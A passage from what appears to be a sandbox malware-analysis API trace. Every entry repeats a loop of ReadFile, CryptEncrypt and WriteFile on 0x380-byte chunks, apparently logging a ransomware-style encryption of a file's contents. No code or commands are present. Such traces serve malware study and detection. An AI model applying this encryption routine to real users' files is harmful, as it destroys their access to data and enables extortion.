lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.803] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.803] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.803] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.803] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.803] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.803] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.803] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.803] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.803] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.803] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.804] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.804] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.804] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.804] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.804] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.804] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.804] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.804] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.804] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.804] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.804] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.804] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.804] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.804] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.804] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.804] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.805] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.805] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.805] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.805] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.805] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.805] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.806] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.806] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.806] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.806] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.806] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.806] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.806] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.806] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.806] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.806] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.806] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.806] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.806] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.806] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.807] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.807] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.807] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.807] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.807] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.807] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.807] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.807] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.807] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.807] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.807] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.807] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.808] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.808] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.808] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.808] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.808] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.808] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.808] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.808] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.809] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.809] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.809] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.809] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.809] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.809] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.809] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.809] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.809] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.809] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.809] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.810] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.810] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.810] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.810] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.810] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.810] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.810] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.810] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.810] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.810] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.810] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.811] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.811] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.811] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 